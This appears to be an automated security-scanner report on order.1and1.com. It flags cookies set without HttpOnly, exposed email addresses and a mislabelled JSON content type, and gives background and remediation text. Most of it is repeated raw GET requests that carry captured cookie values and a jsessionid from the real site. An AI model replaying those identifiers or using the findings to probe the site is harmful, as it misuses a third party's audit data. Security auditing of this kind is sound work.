The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/domaincheck HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=77b06e36ce808c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/eshopupselling HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2b1b8234745e6800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupDomainPrices HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7e68c4801468a800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupGreenPower HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7a09ad3484127800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupPayPalInfo HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=226ab840267c5c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupServerOsCds HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1c33f57f30826000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupServerOsVps HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3b642682d7bbd000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupTcGoogleAdwords HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7feacfa62b8fb000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupWebsiteMagazine HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=59c0d039ad1bdc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/sitedesign HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=8853c31122ce000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/tariffselect HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The response contains the following Content-type statement:
Content-Type: text/plain;charset=utf-8
The response states that it contains plain text. However, it actually appears to contain JSON.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
